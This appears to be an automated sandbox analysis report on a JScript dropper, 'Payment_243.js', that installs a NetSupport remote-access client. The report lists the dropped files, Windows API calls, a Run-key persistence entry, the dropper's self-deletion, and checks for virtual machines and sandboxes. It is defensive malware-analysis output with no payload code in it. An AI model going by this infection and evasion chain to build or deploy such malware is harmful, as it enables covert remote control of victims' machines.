                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,4_2_110077A0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11114590
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3968, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\i99ekubc\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,4_2_111165C0

                                System Summary

                                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgIDJump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11113190: GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,4_2_1115EA00
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\i99ekubc\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: C:\ProgramData\i99ekubc\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: Payment_243.jsInitial sample: Strings found which are bigger than 50
                                Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: classification engineClassification label: mal100.rans.evad.winJS@3/26@2/3
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1105A760 GetLastError,FormatMessageA,LocalFree,4_2_1105A760
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,4_2_1109D860
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,4_2_1109D8F0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,4_2_11116880
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11089430 FindResourceA,LoadResource,LockResource,4_2_11089430
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
                                Source: C:\ProgramData\i99ekubc\client32.exeFile created: C:\Users\user\AppData\Local\NetSupportJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\i99ekubc\client32.exe "C:\ProgramData\i99ekubc\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\i99ekubc\client32.exe "C:\ProgramData\i99ekubc\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exe Section loaded: cscdll.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: synceng.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: linkinfo.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: wer.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: devrtl.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: wow64win.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: wow64cpu.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: pcicl32.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: secur32.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: shfolder.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: pcichek.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: msvcr100.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: pcicapi.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: mpr.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: version.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: winmm.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: wsock32.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: oleacc.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: netapi32.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: netutils.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: srvcli.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: wkscli.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: samcli.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: wtsapi32.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: nsmtrace.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: dbghelp.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: pcihooks.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: dwmapi.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: winsta.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: iphlpapi.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: winnsi.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: dhcpcsvc6.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: wbemcomn2.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: bcrypt.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: cryptsp.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: rpcrtremote.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: dhcpcsvc.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: ntdsapi.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: riched32.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: riched20.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: pciinv.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: winhttp.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: webio.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: dnsapi.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: nlaapi.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Section loaded: rasadhlp.dll
                                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32
                                Source: C:\Windows\System32\wscript.exe File written: C:\ProgramData\i99ekubc\NSM.ini
                                Source: C:\ProgramData\i99ekubc\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Payment_243.js Static file information: File size 5736023 > 1048576
                                Source: C:\Windows\System32\wscript.exe File opened: C:\PROGRA~3\i99ekubc\msvcr100.dll
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000004.00000002.644430314.0000000069DB1000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000004.00000002.644485160.0000000073622000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 00000004.00000002.644024735.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000004.00000000.506306260.0000000000A12000.00000002.00000001.01000000.00000008.sdmp, client32.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.644466466.0000000072B45000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: webmvorbisencoder.dll.0.dr Static PE information: section name: _RDATA
                                Source: PCICL32.DLL.0.dr Static PE information: section name: .hhshare
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1116FF15 push ecx; ret 4_2_1116FF28
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1116AE09 push ecx; ret 4_2_1116AE1C
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_69D16BBF push ecx; ret 4_2_69D16BD2
                                Source: msvcr100.dll.0.dr Static PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\pcicapi.dll
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\TCCTL32.DLL
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\webmmux.dll
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\remcmdstub.exe
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\PCICHEK.DLL
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\PCICL32.DLL
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\HTCTL32.DLL
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\client32.exe
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\webmvorbisencoder.dll
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\msvcr100.dll
                                Source: C:\Windows\System32\wscript.exe File created: C:\ProgramData\i99ekubc\install\api-ms-win-core-localization-l1-2-0.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_69CF7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,4_2_69CF7030
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
                                Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\payment_243.js
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139ED0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,4_2_110C1020
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11113380 IsIconic,GetTickCount,4_2_11113380
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_11025A90
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113FA0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11025EE0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115BEE0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_110241A0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024880
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\i99ekubc\client32.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_69CE91F0 4_2_69CE91F0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_69CF4F30 4_2_69CF4F30
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110B86C0 Sleep,ExitProcess,4_2_110B86C0
                                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                                Source: C:\ProgramData\i99ekubc\client32.exe Window / User API: threadDelayed 392
                                Source: C:\ProgramData\i99ekubc\client32.exe Window / User API: threadDelayed 8080
                                Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\ProgramData\i99ekubc\TCCTL32.DLL
                                Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\ProgramData\i99ekubc\webmmux.dll
                                Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\ProgramData\i99ekubc\remcmdstub.exe
                                Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\ProgramData\i99ekubc\HTCTL32.DLL
                                Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\ProgramData\i99ekubc\webmvorbisencoder.dll
                                Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\ProgramData\i99ekubc\install\api-ms-win-core-localization-l1-2-0.dll
                                Source: C:\ProgramData\i99ekubc\client32.exe Evaded block: after key decision graph_4-93421
                                Source: C:\ProgramData\i99ekubc\client32.exe Evaded block: after key decision graph_4-93819
                                Source: C:\ProgramData\i99ekubc\client32.exe Evaded block: after key decision graph_4-94263
                                Source: C:\ProgramData\i99ekubc\client32.exe Evaded block: after key decision graph_4-94498
                                Source: C:\ProgramData\i99ekubc\client32.exe Evaded block: after key decision graph_4-95191
                                Source: C:\ProgramData\i99ekubc\client32.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_4-93560
                                Source: C:\ProgramData\i99ekubc\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_4-88724
                                Source: C:\ProgramData\i99ekubc\client32.exe API coverage: 6.6 %
                                Source: C:\Windows\System32\wscript.exe TID: 3664 Thread sleep time: -300000s >= -30000s
                                Source: C:\Windows\System32\wscript.exe TID: 3800 Thread sleep time: -60000s >= -30000s
                                Source: C:\ProgramData\i99ekubc\client32.exe TID: 3988 Thread sleep time: -68500s >= -30000s
                                Source: C:\ProgramData\i99ekubc\client32.exe TID: 3992 Thread sleep time: -39200s >= -30000s
                                Source: C:\ProgramData\i99ekubc\client32.exe TID: 4020 Thread sleep time: -360000s >= -30000s
                                Source: C:\ProgramData\i99ekubc\client32.exe TID: 3988 Thread sleep time: -2020000s >= -30000s
                                Source: C:\ProgramData\i99ekubc\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\ProgramData\i99ekubc\client32.exe Last function: Thread delayed
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_69CF3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 69CF3226h 4_2_69CF3130
                                Source: C:\Windows\System32\wscript.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                                Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini
                                Source: HTCTL32.DLL.0.dr Binary or memory string: VMware
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: HTCTL32.DLL.0.dr Binary or memory string: VMWare
                                Source: C:\ProgramData\i99ekubc\client32.exe API call chain: ExitProcess graph end node graph_4-88627
                                Source: C:\ProgramData\i99ekubc\client32.exe API call chain: ExitProcess graph end node graph_4-88589
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\ProgramData\i99ekubc\client32.exe Code function: 4_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,4_2_110B7F30
